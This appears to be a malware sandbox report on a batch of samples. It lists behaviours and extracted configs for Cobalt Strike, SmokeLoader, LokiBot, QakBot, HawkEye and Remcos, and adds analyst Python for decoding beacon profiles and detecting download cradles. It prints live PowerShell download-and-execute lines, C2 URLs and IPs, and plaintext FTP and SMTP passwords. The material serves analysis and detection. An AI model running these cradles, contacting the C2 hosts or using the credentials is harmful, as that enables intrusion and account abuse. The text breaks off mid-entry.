
Overview  10/10
Static    10/10

Analyses (score out of 10 per platform; "-" = no score shown for that run)

Target                 windows7_x64  windows10_x64
foo/0044d6...f7.exe    1             1
foo/034e4c...a9.exe    4             4
foo/035fa2...72.exe    10            10
foo/04884a...1b.exe    8             8
foo/06ed82...59.exe    7             7
foo/07470b...68.exe    8             8
foo/078adb...c0.exe    10            10
foo/09e5c8...b4.exe    1             1
foo/0becfe...f4.exe    10            10
foo/1a78d3...a3.exe    5             5
foo/1ffe82...a6.exe    10            10
foo/255028...e1.dll    1             1
foo/27601d...cc.exe    8             8
foo/27f911...49.exe    10            10
foo/28408c...c5.exe    10            10
foo/296822...e4.dll    3             3
foo/2de7b8...a4.exe    10            10
foo/2e00df...8b.exe    9             9
foo/2e90a1...22.exe    6             6
foo/2f215e...b0.dll    10            10
foo/30bc06...3e.exe    10            10
foo/312e67...f3.exe    4             4
foo/383497...1b.exe    10            10
foo/39555e...ec.exe    10            10
foo/39e531...04.exe    10            10
foo/3aba72...cd.exe    1             1
foo/406c9b...fe.exe    10            10
foo/457cfd...ca.exe    7             7
foo/4761e4...60.exe    8             8
foo/487f1b...04.exe    8             7
foo/4a74c9...cf.exe    10            10
foo/4b2d78...4b.exe    8             8
foo/4c49c2...ba.exe    1             1
foo/4cfe8f...77.exe    9             9
foo/4ea454...13.exe    8             8
foo/52d6c5...7e.exe    7             7
foo/55fc11...e0.exe    -             10
foo/59f0fb...06.exe    1             1
foo/5b1c0d...cb.exe    1             1
foo/5bc72a...ea.exe    8             8
foo/5d3305...2a.exe    7             7
foo/5d9775...39.exe    8             8
foo/60121e...3e.exe    9             9
foo/62565a...fd.exe    10            10
foo/62a3fd...64.exe    8             10
foo/63e9ce...d0.exe    8             8
foo/6497ba...c5.exe    10            10
foo/698cc8...31.exe    7             7
foo/6f2c5c...d5.exe    7             7
foo/798f5e...ba.exe    10            10
foo/7aec86...51.exe    1             1
foo/84bf6e...64.exe    8             8
foo/907b7d...b3.exe    8             8
foo/928f1d...ee.exe    1             1
foo/9401b0...6c.exe    1             1
foo/97dd87...84.exe    10            10
foo/9b8c48...a4.exe    8             8
foo/9cde71...cd.exe    6             6
foo/9d3438...4b.exe    8             1
foo/9f8818...2d.exe    8             3
foo/a17bdc...cf.exe    9             9
foo/a29811...46.exe    10            10
foo/aa3b51...52.exe    10            10
foo/acf0b7...c4.exe    8             8
foo/aeca5c...f7.exe    1             1
foo/b10714...f3.exe    8             8
foo/b23652...9f.exe    6             6
foo/b514b5...fc.exe    1             1
foo/b64196...23.exe    7             7
foo/b693df...60.exe    7             7
foo/b6e7c9...bc.exe    10            10
foo/b7d5f0...4a.exe    10            10
foo/ba2d46...29.exe    1             1
foo/bad78e...e5.exe    9             9
foo/bc6536...b9.exe    10            10
foo/be85e0...2c.exe    1             1
foo/c914b1...ee.exe    3             3
foo/c944ea...cc.exe    8             8
foo/cad363...8b.exe    6             6
foo/cd89b6...df.exe    8             8
foo/d81e76...c4.exe    10            10
foo/d86d2c...08.exe    10            10
foo/d8e37d...98.exe    9             9
foo/dea515...e1.exe    10            6
foo/dfcc55...b8.exe    7             7
foo/e03bd4...fe.exe    8             8
foo/e16ec7...2d.exe    8             8
foo/e61c0e...0e.exe    7             7
foo/e78fad...51.exe    8             8
foo/e7ad45...88.exe    3             3
foo/e95678...8f.exe    1             1
foo/edf723...ee.dll    1             1
foo/f2366f...f5.exe    1             1
foo/f645a9...1f.exe    1             1
foo/f65e75...56.exe    1             1
foo/f66028...2b.exe    8             8
foo/f6c1c7...89.exe    10            10
foo/fbab90...7c.exe    7             7
foo/fcdc00...b3.exe    8             8
foo/fffb61...ba.exe    1             1

General

  • Target

    foo.zip

  • Size

    148.2MB

  • Sample

    200811-8q4fq2yyya

  • MD5

    875294d0dba88dbc80c33a5cbb110b41

  • SHA1

    3727db2a114f7302be5d5a3ef212bc0922060346

  • SHA256

    46dc49be65d7165e2a6009854a4f27f0088230199e61e0555cb1bd266535874a

  • SHA512

    4482e49c33c076cbde30a4da9c7283ef9cc67ae3ae75d9217ea402c206f6fc82aa4ffe90b76ab18c79cda6a7c1e302c02abda6736d594df2b2db273d013e07ab

Malware Config

Extracted

Family

cobaltstrike

C2

http://www.google.com:443/__utm.gif

Attributes
  • access_type

    512

  • beacon_type

    2048

  • host

    www.google.com,/__utm.gif

  • http_header1

    AAAACQAAABJ1dG1hYz1VQS0yMjAyNjA0LTIAAAAJAAAAB3V0bWNuPTEAAAAJAAAAEHV0bWNzPUlTTy04ODU5LTEAAAAJAAAAD3V0bXNyPTEyODB4MTAyNAAAAAkAAAAMdXRtc2M9MzItYml0AAAACQAAAAt1dG11bD1lbi1VUwAAAAoAAAAoSG9zdDogdHJhbnNsYXRlc2VydmljZXVwZGF0ZS5hcHBzcG90LmNvbQAAAAcAAAAAAAAACAAAAAIAAAAGX191dG1hAAAABQAAAAV1dG1jYwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • http_header2

    AAAACgAAACZDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQAAAAcAAAAAAAAAAgAAAAZVQS0yMjAAAAABAAAAAi0yAAAABQAAAAV1dG1hYwAAAAkAAAAHdXRtY249MQAAAAkAAAAQdXRtY3M9SVNPLTg4NTktMQAAAAkAAAAPdXRtc3I9MTI4MHgxMDI0AAAACQAAAAx1dG1zYz0zMi1iaXQAAAAJAAAAC3V0bXVsPWVuLVVTAAAACgAAAChIb3N0OiB0cmFuc2xhdGVzZXJ2aWNldXBkYXRlLmFwcHNwb3QuY29tAAAABwAAAAEAAAAEAAAAAA==

  • http_method1

    GET

  • http_method2

    POST

  • maxdns

    255

  • pipe_name

    \\%s\pipe\msagent_%x

  • polling_time

    60000

  • port_number

    443

  • sc_process32

    %windir%\syswow64\rundll32.exe

  • sc_process64

    %windir%\sysnative\rundll32.exe

  • state_machine

    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC+xef42wyX1NAUR5Ukrnj2L8wg2GQ3+zg6SV5+gTlXxdgo8apUHH/mtKv7A+Fa5aReI1QBvVbMdkwq7A1YwJpBtFUBouokiqs8MjBWWrcftqQno/goPu3jDA1eHNyB8Hn+E4URKzRBBwQBduCA6fvUK83z/jAh062sZrZaFGE6dwIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • unknown1

    6.71092736e+08

  • unknown2

    AAAABAAAAAIAAAAPAAAAAgAAAA8AAAACAAAACgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • uri

    /___utm.gif

  • user_agent

    Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)
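The http_header1, http_header2 and state_machine values above are opaque until decoded. The script below is an added example (not Triage's code, and not one of the public parsers it imitates) that decodes all three blobs copied from this page. The transform-step numbering is the one used by public beacon-config parsers (1768.py, CobaltStrikeParser) and is an assumption; for this sample it is confirmed by the decoded program matching Cobalt Strike's stock webbug.profile step for step (the utmac=UA-2202604-2 parameter, the __utma cookie carrying netbios-encoded metadata, the UA-220/-2 wrapped session id). Two practitioner-level points fall out of the decode: the profile forces Host: translateserviceupdate.appspot.com while the beacon connects to www.google.com:443, which is the classic domain-fronting layout, and the field Triage labels state_machine is a DER SubjectPublicKeyInfo (the MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ prefix is the stock 1024-bit RSA header), i.e. the team server's public key, which is what you cluster beacons on.

```python
import base64
import struct

# Malleable C2 transform step ids -> profile keywords, as used by the public
# beacon-config parsers 1768.py and CobaltStrikeParser (assumed; the ids this
# sample uses, 1 2 4 5 7 8 9 10, are confirmed by the match with webbug.profile).
STEP_NAMES = {
    1: "append", 2: "prepend", 3: "base64", 4: "print", 5: "parameter",
    6: "header", 7: "build", 8: "netbios", 9: "const_parameter",
    10: "const_header", 11: "netbiosu", 12: "uri_append", 13: "base64url",
    14: "strrep", 15: "mask", 16: "const_host_header",
}
NO_ARG = {3, 4, 8, 11, 13, 15}  # steps that carry no argument
BUILD, STRREP = 7, 14           # uint32 argument / two string arguments

# Blobs copied verbatim from the Malware Config section of this page.
HTTP_HEADER1 = "AAAACQAAABJ1dG1hYz1VQS0yMjAyNjA0LTIAAAAJAAAAB3V0bWNuPTEAAAAJAAAAEHV0bWNzPUlTTy04ODU5LTEAAAAJAAAAD3V0bXNyPTEyODB4MTAyNAAAAAkAAAAMdXRtc2M9MzItYml0AAAACQAAAAt1dG11bD1lbi1VUwAAAAoAAAAoSG9zdDogdHJhbnNsYXRlc2VydmljZXVwZGF0ZS5hcHBzcG90LmNvbQAAAAcAAAAAAAAACAAAAAIAAAAGX191dG1hAAAABQAAAAV1dG1jYwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="
HTTP_HEADER2 = "AAAACgAAACZDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQAAAAcAAAAAAAAAAgAAAAZVQS0yMjAAAAABAAAAAi0yAAAABQAAAAV1dG1hYwAAAAkAAAAHdXRtY249MQAAAAkAAAAQdXRtY3M9SVNPLTg4NTktMQAAAAkAAAAPdXRtc3I9MTI4MHgxMDI0AAAACQAAAAx1dG1zYz0zMi1iaXQAAAAJAAAAC3V0bXVsPWVuLVVTAAAACgAAAChIb3N0OiB0cmFuc2xhdGVzZXJ2aWNldXBkYXRlLmFwcHNwb3QuY29tAAAABwAAAAEAAAAEAAAAAA=="
STATE_MACHINE = "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC+xef42wyX1NAUR5Ukrnj2L8wg2GQ3+zg6SV5+gTlXxdgo8apUHH/mtKv7A+Fa5aReI1QBvVbMdkwq7A1YwJpBtFUBouokiqs8MjBWWrcftqQno/goPu3jDA1eHNyB8Hn+E4URKzRBBwQBduCA6fvUK83z/jAh062sZrZaFGE6dwIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="


def _b64(s):
    s = s.rstrip("=")
    if len(s) % 4 == 1:  # a stray trailing char can only be zero padding here
        s = s[:-1]
    return base64.b64decode(s + "=" * (-len(s) % 4))


def _take_str(buf, off):
    (n,) = struct.unpack_from(">I", buf, off)
    return buf[off + 4:off + 4 + n].decode("latin-1"), off + 4 + n


def decode_transform(b64):
    """Big-endian uint32 step id, then the step's argument(s); a zero id ends
    the program (the remainder of the blob is zero padding)."""
    buf, off, steps = _b64(b64), 0, []
    while off + 4 <= len(buf):
        (kind,) = struct.unpack_from(">I", buf, off)
        off += 4
        if kind == 0:
            break
        name = STEP_NAMES.get(kind, f"unknown_{kind}")
        if kind in NO_ARG:
            steps.append((name,))
        elif kind == BUILD:  # 0 = metadata (GET) or id (POST), 1 = output
            steps.append((name, struct.unpack_from(">I", buf, off)[0]))
            off += 4
        elif kind == STRREP:
            a, off = _take_str(buf, off)
            b, off = _take_str(buf, off)
            steps.append((name, a, b))
        else:
            s, off = _take_str(buf, off)
            steps.append((name, s))
    return steps


def to_profile(steps):
    """Render decoded steps in Malleable C2 profile syntax."""
    out = []
    for name, *args in steps:
        if name in ("const_parameter", "const_header"):
            k, _, v = args[0].partition("=" if name == "const_parameter" else ": ")
            out.append(f'{name[6:]} "{k}" "{v}";')
        elif name == "build":
            out.append(f"build {args[0]};")
        else:
            out.append(name + "".join(f' "{a}"' for a in args) + ";")
    return out


def host_header(steps):
    """Host header forced by a const_header step (None if absent). Compare it
    with the connect target in the C2 field: they differ for this sample."""
    for step in steps:
        if step[0] == "const_header" and step[1].lower().startswith("host:"):
            return step[1].split(":", 1)[1].strip()
    return None


def _der_len(buf, off):
    """DER length at buf[off] -> (length, offset of the content)."""
    if buf[off] < 0x80:
        return buf[off], off + 1
    n = buf[off] & 0x7F
    return int.from_bytes(buf[off + 1:off + 1 + n], "big"), off + 1 + n


def rsa_modulus_bits(b64):
    """Walk the SubjectPublicKeyInfo in the state_machine blob and return the
    RSA modulus size in bits."""
    der = _b64(b64)
    if der[0] != 0x30:
        raise ValueError("not a DER SEQUENCE")
    _, off = _der_len(der, 1)            # SubjectPublicKeyInfo SEQUENCE
    n, off = _der_len(der, off + 1)      # AlgorithmIdentifier SEQUENCE
    _, off = _der_len(der, off + n + 1)  # skip it, then the BIT STRING
    _, off = _der_len(der, off + 2)      # unused-bits byte, RSAPublicKey SEQUENCE
    n, off = _der_len(der, off + 1)      # INTEGER modulus
    return len(der[off:off + n].lstrip(b"\x00")) * 8


if __name__ == "__main__":
    for label, blob in (("http-get", HTTP_HEADER1), ("http-post", HTTP_HEADER2)):
        print(label + "\n    " + "\n    ".join(to_profile(decode_transform(blob))))
    print("Host header:", host_header(decode_transform(HTTP_HEADER1)))
    print("RSA modulus bits:", rsa_modulus_bits(STATE_MACHINE))
```

Because the decoded program is the unmodified stock webbug.profile, existing network signatures for that profile (the fixed utm* query parameters on /___utm.gif and /__utm.gif) already cover this beacon; the operator-specific indicators are the Host header value and the public key.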

Extracted

Family

smokeloader

Version

2018

C2

http://segodnya.bit/biologe/

Keys

rc4.i32  1  0x4e29ab2c
rc4.i32  1  0x693d7eba

Extracted

Family

lokibot

C2

http://clogwars.com/~zadmin/lmark/seng/link.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

http://hawkcarts.info/jeff/five/fre.php

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    files.000webhost.com
  • Port:
    21
  • Username:
    foroni

Extracted

Language
ps1
Deobfuscated

1  invoke-expression (new-object net.webclient).downloadstring("https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1")
2  invoke-expression (new-object net.webclient).downloadstring("https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1")
3  invoke-mainworker -command "C:\\Users\\Admin\\AppData\\Local\\Temp\\xujysixlggxpjklaxynlrhabicstv.txt"
4

URLs

ps1.dropper  https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1
ps1.dropper  https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1

Extracted

Family

qakbot

Campaign

1535648626

Credentials

  • Protocol:
    ftp
  • Host:
    37.60.244.211
  • Port:
    21
  • Username:
    backup_manager@garciasdrywall.com
  • Password:
    4AsEzIaMwi2d

  • Protocol:
    ftp
  • Host:
    198.38.77.162
  • Port:
    21
  • Username:
    backup_manager@worldexpresscargo.com
  • Password:
    kJm6DKVPfyiv

  • Protocol:
    ftp
  • Host:
    61.221.12.26
  • Port:
    21
  • Username:
    logger@ostergift.com
  • Password:
    346HZGCMlwecz9S

  • Protocol:
    ftp
  • Host:
    67.222.137.18
  • Port:
    21
  • Username:
    logger@grupocrepusculo.net
  • Password:
    p4a8k6fE1FtA3pR

  • Protocol:
    ftp
  • Host:
    107.6.152.61
  • Port:
    21
  • Username:
    logger@trussedup.com
  • Password:
    RoP4Af0RKAAQ74V
C2

190.185.219.110:443

73.74.72.141:443

65.116.179.83:443

50.198.141.161:2078

70.183.154.153:995

68.49.120.179:443

70.94.109.57:443

24.45.54.50:2222

190.80.21.204:2222

216.201.159.118:443

74.88.210.56:995

75.189.235.216:443

47.48.236.98:2222

68.59.209.183:995

75.3.101.153:443

108.17.25.169:443

185.219.83.73:443

184.180.157.203:2222

207.178.109.161:443

174.48.72.160:443

Extracted

Language
ps1
Deobfuscated

1  invoke-expression (new-object net.webclient).downloadstring("https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1")
2  invoke-expression (new-object net.webclient).downloadstring("https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1")
3  invoke-mainworker -command "C:\\Users\\Admin\\AppData\\Local\\Temp\\dworresfxzjxabptoatbbqjfpcfgrc.txt"
4

URLs

ps1.dropper  https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1
ps1.dropper  https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1
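Both deobfuscated PowerShell stages above have the same shape: invoke-expression over a net.webclient.downloadstring fetch from Dropbox, with ?dl=1 so Dropbox serves the raw file instead of its preview page, followed by a call into a function (invoke-mainworker) that only exists once the fetched code has run. The classifier below is an added example, not part of the Triage report; it turns that shape into detection logic and runs it over the three lines from this page plus two constructed benign lines. The regexes and the STAGING_HOSTS list are the author's assumptions, to be extended for your environment.

```python
import re
from urllib.parse import urlparse

# Ways to evaluate a string as code, and ways to pull remote content.
EVAL_RE = re.compile(r"\b(invoke-expression|iex)\b", re.I)
FETCH_RE = re.compile(
    r"\b(downloadstring|downloadfile|downloaddata|invoke-webrequest|iwr|"
    r"invoke-restmethod|irm|start-bitstransfer)\b", re.I)
URL_RE = re.compile(r"https?://[^\s\"')]+", re.I)
# File-hosting services commonly abused for staging (assumed list).
STAGING_HOSTS = ("dropbox.com", "pastebin.com", "raw.githubusercontent.com",
                 "cdn.discordapp.com")

# Sample command lines: the three deobfuscated lines from this page, then two
# constructed benign ones.
SAMPLE_LINES = [
    r'invoke-expression (new-object net.webclient).downloadstring("https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1")',
    r'invoke-expression (new-object net.webclient).downloadstring("https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1")',
    r'invoke-mainworker -command "C:\\Users\\Admin\\AppData\\Local\\Temp\\xujysixlggxpjklaxynlrhabicstv.txt"',
    r"Get-ChildItem -Path C:\Windows\Temp -Recurse",                        # constructed
    r"Get-Process | Sort-Object CPU -Descending | Select-Object -First 5",  # constructed
]


def classify(cmdline):
    """'cradle' = fetches remote content and evaluates it in one line,
    'fetch' = only downloads, 'clean' = neither. Also reports which URLs
    point at known staging hosts and whether Dropbox's ?dl=1 is used."""
    urls = URL_RE.findall(cmdline)
    hosts = [urlparse(u).hostname or "" for u in urls]
    evaluates = bool(EVAL_RE.search(cmdline))
    fetches = bool(FETCH_RE.search(cmdline))
    staging = [h for h in hosts
               if any(h == s or h.endswith("." + s) for s in STAGING_HOSTS)]
    if evaluates and fetches:
        verdict = "cradle"
    elif fetches:
        verdict = "fetch"
    else:
        verdict = "clean"
    return {"verdict": verdict, "urls": urls, "staging_hosts": staging,
            "forced_download": any("dl=1" in u for u in urls)}


def triage(lines):
    """Return (line, classification) for every line that is not clean."""
    hits = []
    for line in lines:
        result = classify(line)
        if result["verdict"] != "clean":
            hits.append((line, result))
    return hits


if __name__ == "__main__":
    for line, result in triage(SAMPLE_LINES):
        print(result["verdict"], result["staging_hosts"], line[:60])
```

The third page line is classified clean on its own, which is the point: a detection that keys only on cmdlet names misses the stage that does the work, so the cradle line (the only one with a URL and an evaluation) is the one to alert on, and the temp-file path it hands to invoke-mainworker is what to pull from the host afterwards.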

Extracted

Family

hawkeye_reborn

Version

9.0.1.6

Credentials

  • Protocol:
    smtp
  • Host:
    mail.mwanzompya.com
  • Port:
    587
  • Username:
    info@mwanzompya.com
  • Password:
    mwanzo#05
Mutex

382536c5-1156-46e8-b78f-7f58423a46e3

Attributes
  • fields

    _AntiDebugger: false
    _AntiVirusKiller: false
    _BotKiller: false
    _ClipboardLogger: true
    _Delivery: 0
    _DisableCommandPrompt: false
    _DisableRegEdit: false
    _DisableTaskManager: false
    _Disablers: false
    _EmailPassword: mwanzo#05
    _EmailPort: 587
    _EmailSSL: false
    _EmailServer: mail.mwanzompya.com
    _EmailUsername: info@mwanzompya.com
    _ExecutionDelay: 10
    _FTPPort: 0
    _FTPSFTP: false
    _FakeMessageIcon: 0
    _FakeMessageShow: false
    _FileBinder: false
    _HideFile: false
    _HistoryCleaner: false
    _Install: false
    _InstallLocation: 0
    _InstallStartup: false
    _InstallStartupPersistance: false
    _KeyStrokeLogger: true
    _LogInterval: 10
    _MeltFile: false
    _Mutex: 382536c5-1156-46e8-b78f-7f58423a46e3
    _PasswordStealer: true
    _ProcessElevation: false
    _ProcessProtection: false
    _ScreenshotLogger: false
    _SystemInfo: false
    _Version: 9.0.1.6
    _WebCamLogger: false
    _WebsiteBlocker: false
    _WebsiteVisitor: false
    _WebsiteVisitorVisible: false
    _ZoneID: false

  • name

    HawkEye Keylogger - Reborn v9, Version=9.0.1.6, Culture=neutral, PublicKeyToken=null

Extracted

Credentials

  • Protocol:
    smtp
  • Host:
    mail.mwanzompya.com
  • Port:
    587
  • Username:
    info@mwanzompya.com
  • Password:
    mwanzo#05

Extracted

Family

remcos

C2

185.244.29.195:1991

Targets

    • Target

      foo/0044d66e4abf7c4af6b5d207065320f7

    • Size

      127KB

    • MD5

      0044d66e4abf7c4af6b5d207065320f7

    • SHA1

      07e73ac58bee7bdc26d289bb2697d2588a6b7e64

    • SHA256

      b6d19c3e6e82bbde62984f50144ce4d98a18871374ec5d313489d5831317c480

    • SHA512

      25633ea2e3cc78262ba69de30d2d3b7f6c013ce3bcbad2eda3c424ac50d7c0b7169372c5ad2b2cd81748ea0622f3db5ba3429f0d3ecfd3feabbfc65d961af5dd

    Score
    1/10
    • Target

      foo/034e4c62965f8d5dd5d5a2ce34a53ba9

    • Size

      416KB

    • MD5

      034e4c62965f8d5dd5d5a2ce34a53ba9

    • SHA1

      edc165e7e833a5e5345f675467398fb38cf6c16f

    • SHA256

      52cb02da0462fdd08d537b2c949e2e252f7a7a88354d596e9f5c9f1498d1c68f

    • SHA512

      c2de626a339d21e5fd287c0e625bca02c770e09f9cad01005160d473164fa8edc5fc381b6ddd01293bdd31f2d7de1b0171674d12ec428e42a97d0ed0b7efb9dd

    Score
    4/10
    • Target

      foo/035fa2f2fae0a8fad733686a7d9ea772

    • Size

      291KB

    • MD5

      035fa2f2fae0a8fad733686a7d9ea772

    • SHA1

      411ee99b26bb612b1905b0c7254129fb1dd0cb56

    • SHA256

      f823ee1362132d0c4cb632829abbaae16b7ae8f938e86a10bdab3897e4f5dc8c

    • SHA512

      9a58f3b940e83e79fd7c7353b8d20947ab45ee48c617217f7c5ac58b1a0d0b5904eda1d49eb118a55f309291055b50b4710a6ab598ae5b29bbb6ff541ab599f1

    • SmokeLoader

      Modular backdoor trojan in use since 2014.

    • Maps connected drives based on registry

      Disk information is often read in order to detect sandboxing environments.

    • Target

      foo/04884a82d01d733f245d921e1f74fb1b

    • Size

      2.9MB

    • MD5

      04884a82d01d733f245d921e1f74fb1b

    • SHA1

      975c743feccce12419d4d72f26c2d44c8591118a

    • SHA256

      e3d13acdbf704b60569fad130fec670ff20d99183fb4bfb32f339dd3138a5f2f

    • SHA512

      c7f26c9656a14a2865da01e7903f29b2474e5fb3bb7a054d09fdd7ea476f7c3666bf4b3fc87e676c4829c0f51942273bb8161b448e42246898985874389a072c

    Score
    8/10
    • Executes dropped EXE

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Loads dropped DLL

    • Writes to the Master Boot Record (MBR)

      Bootkits write to the MBR to gain persistence at a level below the operating system.

    • Target

      foo/06ed82e88e1f68cc08602d7cd8ec5f59

    • Size

      12.2MB

    • MD5

      06ed82e88e1f68cc08602d7cd8ec5f59

    • SHA1

      37d4750e5f22cc395dd721dd5df73aeccc095bb5

    • SHA256

      43eebbd84e92a99b2bbca0b578df68dc07756e2c5fe908c668ac8c69f934a7e5

    • SHA512

      63060f8723b2ad50b8bfc225af22156215d5362bcf4a3ad77d9fe9059414b8ba69679f5fcf83159da224f165a83ebee74a306300f41205a887a06ec0bb86f895

    Score
    7/10
    • Loads dropped DLL

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Target

      foo/07470b6ede84f02ec31ab0a601cdc068

    • Size

      199KB

    • MD5

      07470b6ede84f02ec31ab0a601cdc068

    • SHA1

      2ca5cc5bf36cf0dfc95a128267e5ca1bdead991b

    • SHA256

      c7307db0fdd462a0415cec9cb707045f575d28ae18f2db8efcedd7a2db3079ac

    • SHA512

      002bd7b302ce582ae8921f2613ab340a366a5928e32d1bddf6fbfc16f8fbde2ea93668775d418ea1b3375a32eff24d3f8e32a8f17d7549a743b545f873a0dab7

    Score
    8/10
    • Executes dropped EXE

    • Loads dropped DLL

    • Target

      foo/078adb95b1a0a6449d8c4ece796deac0

    • Size

      349KB

    • MD5

      078adb95b1a0a6449d8c4ece796deac0

    • SHA1

      412cbff9af426e0af43b9b860150c7c30ebce654

    • SHA256

      94a65945d7cebe9755b6cb5cffe7139c848bcbbf5988b07a3d195c57f5e44a89

    • SHA512

      32b58760617c268de6571bae946d3757f021fc975e3546333371d1667e592057a71956578039e75ad953e8a8aff18d1f871e2fe360abe13a9866f1d56f5ea3e0

    Score
    10/10
    • Imminent RAT

      Remote-access trojan based on Imminent Monitor remote admin software.

    • Drops desktop.ini file(s)

    • Target

      foo/09e5c88a0592763e0c4f30fb88d663b4

    • Size

      713KB

    • MD5

      09e5c88a0592763e0c4f30fb88d663b4

    • SHA1

      939a8f3e7477ce8ee6406ac2b8aa58bd8399e1b4

    • SHA256

      9aac9319312f83811ad3ee68cd0ae467c088fa484ce921271be0382dc0d027fc

    • SHA512

      aa8aaa125fc6a47db42b882c960dc52e16df2a308675382f761a66060da414c26345fa526c92e322104b563372f7de6c305645d7a626fd5e4b5c100bdaba089b

    Score
    1/10
    • Target

      foo/0becfedf4d0b9ad5251aca33274a4cf4

    • Size

      443KB

    • MD5

      0becfedf4d0b9ad5251aca33274a4cf4

    • SHA1

      5d6faf04a6215b08988f289373f3b239d5878d06

    • SHA256

      235b35c4574f4d28ac034e7fbd4827384f6243d591d1d1bd76e320905f5b0242

    • SHA512

      0e835c83ff46c74acf6140bd434666ddffd2c0aa9875fc9899daff62b473ab98ee0947c226e9ffd8c4322b418574e9f5e2d2d32415b232667921c3db404dcd35

    • Modifies WinLogon for persistence

    • Modifies firewall policy service

    • Modifies security service

    • UAC bypass

    • Windows security bypass

    • ASPack v2.12-2.42

      Detects executables packed with ASPack v2.12-2.42

    • Disables Task Manager via registry modification

    • Executes dropped EXE

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

    • Drops startup file

    • Loads dropped DLL

    • Windows security modification

    • Adds Run key to start application

    • Checks whether UAC is enabled

    • Suspicious use of SetThreadContext

    • Target

      foo/1a78d313f2891bd468f78694814a28a3

    • Size

      5.5MB

    • MD5

      1a78d313f2891bd468f78694814a28a3

    • SHA1

      7b10daf92b6bb599c68379909fbc951955e9335e

    • SHA256

      b8953f266d0ec05808dd5ba4799986c61bfc4d6e5308b0da84cbc8afe19de4df

    • SHA512

      4a9d76516888a4abff4acb29712abdc65674d5a9a3e69b0e30fa0cf815267d7d45f02d4879383232eb44c5503256af3adc4cb3db201e603816ccc983666475cb

    Score
    5/10
    • Drops file in System32 directory

    • Suspicious use of NtSetInformationThreadHideFromDebugger

    • Target

      foo/1ffe827beb75335731cb6f052a8ec3a6

    • Size

      468KB

    • MD5

      1ffe827beb75335731cb6f052a8ec3a6

    • SHA1

      381ff47af182f52185fe2ff8d01453c5f611b04a

    • SHA256

      bf26329c083407931e46c85220e294904dc532e1095823290c04537f15316e47

    • SHA512

      fe1d68657aa99cb2949aa4aee3c12a70ba4f1fa9542f4606fb6a63627c593c74ce2188ebba15c2e366d8c79c4591e2bc048505abf4eed16d156a9b2ecf6334c8

    • WarzoneRat, AveMaria

      WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

    • Warzone RAT Payload

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

    • Target

      foo/255028f2f37838e92f84f27c68aaf4e1

    • Size

      536KB

    • MD5

      255028f2f37838e92f84f27c68aaf4e1

    • SHA1

      64e6d06aba93b91fbda44364278f2a91e91c6cf3

    • SHA256

      db04d912a4fa503b27bea546ca8160b040e3eaf8eabfa5ee0dc30b64738976e2

    • SHA512

      be1f9a5005c9c446a100891c9c955336e011ba550ca7c1f5dd4dd9c3f3041ff20fa30445f117331b6d121b0e89361bead40b981c50f01ce185fa3acf2b7d00d8

    Score
    1/10
    • Target

      foo/27601d095e5b3761d9289584415a73cc

    • Size

      565KB

    • MD5

      27601d095e5b3761d9289584415a73cc

    • SHA1

      9570f23b5abe2ef46a23ded17adb2fb6c203a201

    • SHA256

      749f5e042b317dc4e989c174d92936ef83d9d4fbf4c190f0e5b759b858b15cf4

    • SHA512

      066263bf8f11d48b4e3715b8962686e0ca32aa8647b642a193b5331513538a44bb49edad5ef6a08ae6cc6401504fadc7adf38efb07c9ae9560e947aac443e0e7

    Score
    8/10
    • Executes dropped EXE

    • Loads dropped DLL

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Target

      foo/27f9116902c35a9b784c703762bbd249

    • Size

      1.3MB

    • MD5

      27f9116902c35a9b784c703762bbd249

    • SHA1

      1f398a7f5bb032a30c2207e5e692524691b8a09e

    • SHA256

